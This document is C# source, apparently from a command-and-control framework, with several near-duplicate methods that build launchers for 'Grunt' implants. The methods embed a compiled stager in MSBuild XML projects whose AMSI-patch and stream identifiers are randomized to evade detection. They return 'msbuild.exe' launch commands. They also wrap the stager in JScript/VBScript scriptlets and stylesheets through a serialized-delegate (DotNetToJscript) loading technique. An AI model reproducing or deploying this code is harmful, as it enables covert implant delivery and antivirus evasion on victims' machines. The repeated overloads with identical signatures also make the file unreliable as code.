/// <summary>
/// Renders the on-disk MSBuild project (XML) that embeds an already-compiled
/// stager, and returns the command line that launches it.
/// </summary>
/// <param name="StagerCode">Stager source text; stored in <c>StagerCode</c> unchanged.</param>
/// <param name="StagerAssembly">Compiled stager assembly; base64-encoded into the template.</param>
/// <param name="grunt">Not read by this method; present to satisfy the override signature.</param>
/// <param name="template">Only <c>template.Name</c> is used: it names the .xml file in the launcher command.</param>
/// <returns>The launcher command line, which is also stored in <c>LauncherString</c>.</returns>
/// <remarks>
/// Substitutions are applied sequentially, each on the output of the previous one;
/// the placeholder order below is therefore significant and mirrors the template.
/// The <c>random_var_*</c> members replace fixed identifiers in the template
/// (presumably randomized per instance to vary the on-disk artifact — confirm where
/// they are generated). Note that the launcher command refers to
/// <c>template.Name + ".xml"</c>; the caller is responsible for writing <c>DiskCode</c>
/// under exactly that name.
/// </remarks>
public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
{
    this.StagerCode = StagerCode;
    this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);

    // Ordered (placeholder, value) pairs. Payload and scheduling names first,
    // then the identifier renames used for obfuscation.
    string[][] substitutions = new[]
    {
        new[] { "{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString },
        new[] { "{{TARGET_NAME}}", this.TargetName },
        new[] { "{{TASK_NAME}}", this.TaskName },
        // Replacements for obfuscation
        new[] { "{{PATCH_AMSI}}", this.random_var_patchAmsi },
        new[] { "{{AMSI}}", this.random_var_amsi },
        new[] { "{{MEMORY_STREAM}}", this.random_var_outputMemoryStream },
        new[] { "{{DEFLATE_STREAM}}", this.random_var_deflateStream },
        new[] { "{{BYTE_ARRAY}}", this.random_var_byteArray },
        new[] { "{{READ}}", this.random_var_read },
        new[] { "{{LIB}}", this.random_var_lib },
        new[] { "{{AMSI_DLL_0}}", this.random_var_amsi_dll[0] },
        new[] { "{{AMSI_DLL_1}}", this.random_var_amsi_dll[1] },
        new[] { "{{AMSI_SCAN_BUFF_0}}", this.random_var_amsiScanBuffer[0] },
        new[] { "{{AMSI_SCAN_BUFF_1}}", this.random_var_amsiScanBuffer[1] },
        new[] { "{{AMSI_SCAN_BUFF_2}}", this.random_var_amsiScanBuffer[2] },
        new[] { "{{ASSEMBLY_BUFFER}}", this.random_var_assemblyBuffer },
    };

    string rendered = XMLTemplate;
    foreach (string[] pair in substitutions)
    {
        rendered = rendered.Replace(pair[0], pair[1]);
    }
    this.DiskCode = rendered;

    // The project file is expected on disk as "<template.Name>.xml".
    this.LauncherString = string.Concat("msbuild.exe ", template.Name, ".xml");
    return this.LauncherString;
}
/// <summary>
/// Obtains the stager source and compiled stager from the listener, renders the
/// MSBuild project (XML) that embeds it, and returns the launcher command line.
/// </summary>
/// <param name="listener">Source of the stager code and of the compiled, base64-encoded assembly.</param>
/// <param name="grunt">Passed through to the listener's stager generation/compilation.</param>
/// <param name="profile">Passed through to the listener's stager generation/compilation.</param>
/// <returns>The launcher command line, which is also stored in <c>LauncherString</c>.</returns>
/// <remarks>
/// The final <c>true</c> argument to <c>CompileGruntStagerCode</c> is a flag whose
/// meaning is not visible here (the scriptlet launcher passes <c>false</c>) — confirm
/// against the listener implementation. The launcher command hard-codes
/// <c>file.xml</c>, so <c>DiskCode</c> must be written under that exact name; this
/// differs from the template-based overload, which uses the template name.
/// </remarks>
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile)
{
    this.StagerCode = listener.GetGruntStagerCode(grunt, profile);
    this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, true);

    // Sequential substitution into the XML template: payload first, then the
    // target/task names.
    this.DiskCode = XMLTemplate
        .Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString)
        .Replace("{{TARGET_NAME}}", this.TargetName)
        .Replace("{{TASK_NAME}}", this.TaskName);

    const string launcherCommand = "msbuild.exe file.xml";
    this.LauncherString = launcherCommand;
    return this.LauncherString;
}
/// <summary>
/// Renders the MSBuild project (XML) that embeds an already-compiled stager and
/// returns the launcher command line.
/// </summary>
/// <param name="StagerCode">Stager source text; stored in <c>StagerCode</c> unchanged.</param>
/// <param name="StagerAssembly">Compiled stager assembly; base64-encoded into the template.</param>
/// <param name="grunt">Not read by this method; present to satisfy the override signature.</param>
/// <param name="template">Not read by this method; the launcher command uses a fixed file name.</param>
/// <returns>The launcher command line, which is also stored in <c>LauncherString</c>.</returns>
/// <remarks>
/// The launcher command hard-codes <c>file.xml</c>, so <c>DiskCode</c> must be
/// written under that exact name for the command to work.
/// </remarks>
public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
{
    this.StagerCode = StagerCode;
    this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);

    // Sequential substitution into the XML template: payload first, then the
    // target/task names.
    this.DiskCode = XMLTemplate
        .Replace("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString)
        .Replace("{{TARGET_NAME}}", this.TargetName)
        .Replace("{{TASK_NAME}}", this.TaskName);

    const string launcherCommand = "msbuild.exe file.xml";
    this.LauncherString = launcherCommand;
    return this.LauncherString;
}
/// <summary>
/// Builds a JScript/VBScript launcher that carries the compiled stager inside a
/// BinaryFormatter-serialized delegate (the DotNetToJscript technique), wraps it
/// according to <c>ScriptType</c>, and hands the result to <c>GetLauncher(string)</c>.
/// </summary>
/// <param name="listener">Source of the stager code and of the compiled, base64-encoded assembly.</param>
/// <param name="grunt">Passed through to the listener's stager generation/compilation.</param>
/// <param name="profile">Passed through to the listener's stager generation/compilation.</param>
/// <returns>Whatever <c>GetLauncher(string)</c> returns for the rendered <c>DiskCode</c>.</returns>
/// <remarks>
/// Security-relevant notes for reviewers:
/// - The script loads the assembly by deserializing a serialized delegate
///   (<c>FrontBinaryFormattedDelegate</c> + IL + <c>EndBinaryFormattedDelegate</c>);
///   this is intentional offensive tooling, not a bug, but it is the reason the
///   artifact is detected by deserialization-based signatures.
/// - If <c>ScriptLanguage</c> is neither JScript nor VBScript, <c>code</c> and
///   <c>language</c> stay empty and an empty script is rendered without error.
/// - If <c>DotNetFrameworkVersion</c> is neither Net35 nor Net40, the
///   <c>{{REPLACE_VERSION_SETTER}}</c> placeholder is left in the output.
/// - Only the VBScript branch wraps the script in CDATA for the Stylesheet type.
/// </remarks>
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile)
{
    this.StagerCode = listener.GetGruntStagerCode(grunt, profile);
    // Final argument differs from the MSBuild launcher's (true); its meaning is
    // not visible here — confirm against the listener implementation.
    this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, false);

    // Credit DotNetToJscript (tyranid - James Forshaw)
    // Splice the raw assembly bytes between the two fixed halves of a
    // BinaryFormatter-serialized delegate.
    byte[] serializedDelegate = Convert.FromBase64String(FrontBinaryFormattedDelegate).Concat(Convert.FromBase64String(this.Base64ILByteString)).Concat(Convert.FromBase64String(EndBinaryFormattedDelegate)).ToArray();

    // Pad the buffer with zero bytes to a multiple of 3 so the base64 below has
    // no '=' padding characters (presumably so the script-side decoder is not
    // sensitive to them — confirm against the templates).
    int ofs = serializedDelegate.Length % 3;
    if (ofs != 0)
    {
        int length = serializedDelegate.Length + (3 - ofs);
        Array.Resize(ref serializedDelegate, length);
    }
    string base64Delegate = Convert.ToBase64String(serializedDelegate);

    // Break the base64 into 80-character pieces; each language joins them with
    // its own string-concatenation syntax below.
    int lineLength = 80;
    List <String> splitString = new List <String>();
    for (int i = 0; i < base64Delegate.Length; i += lineLength)
    {
        splitString.Add(base64Delegate.Substring(i, Math.Min(lineLength, base64Delegate.Length - i)));
    }

    // Language-specific script body. Templates are normalized to CRLF before
    // substitution; the joined delegate block already uses CRLF.
    string language = "";
    string code = "";
    if (this.ScriptLanguage == ScriptingLanguage.JScript)
    {
        string DelegateBlock = String.Join("\"+\r\n\"", splitString.ToArray());
        code = JScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock);
        language = "JScript";
    }
    else if (this.ScriptLanguage == ScriptingLanguage.VBScript)
    {
        string DelegateBlock = String.Join("\"\r\ns = s & \"", splitString.ToArray());
        code = VBScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock);
        if (this.ScriptType == ScriptletType.Stylesheet)
        {
            // CDATA wrapping is applied here for VBScript only.
            code = "<![CDATA[\r\n" + code + "\r\n]]>";
        }
        language = "VBScript";
    }

    // Container selection: bare script, <script>-tagged script, scriptlet
    // (tagged script plus ProgId), or stylesheet.
    if (this.ScriptType == ScriptletType.Plain)
    {
        this.DiskCode = code;
    }
    else if (this.ScriptType == ScriptletType.Scriptlet || this.ScriptType == ScriptletType.TaggedScript)
    {
        string TaggedScript = TaggedScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language);
        TaggedScript = TaggedScript.Replace("{{REPLACE_SCRIPT}}", code);
        if (this.ScriptType == ScriptletType.TaggedScript)
        {
            this.DiskCode = TaggedScript;
        }
        else
        {
            this.DiskCode = ScriptletCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_TAGGED_SCRIPT}}", TaggedScript).Replace("{{REPLACE_PROGID}}", this.ProgId);
        }
    }
    else if (this.ScriptType == ScriptletType.Stylesheet)
    {
        this.DiskCode = StylesheetCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language);
        this.DiskCode = DiskCode.Replace("{{REPLACE_SCRIPT}}", code);
    }

    // Runtime version selector: empty for .NET 3.5, the JScript setter for 4.0.
    // Any other version leaves the placeholder in place (see remarks).
    if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net35)
    {
        this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", "");
    }
    else if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net40)
    {
        this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", JScriptNet40VersionSetter);
    }
    return(GetLauncher(this.DiskCode));
}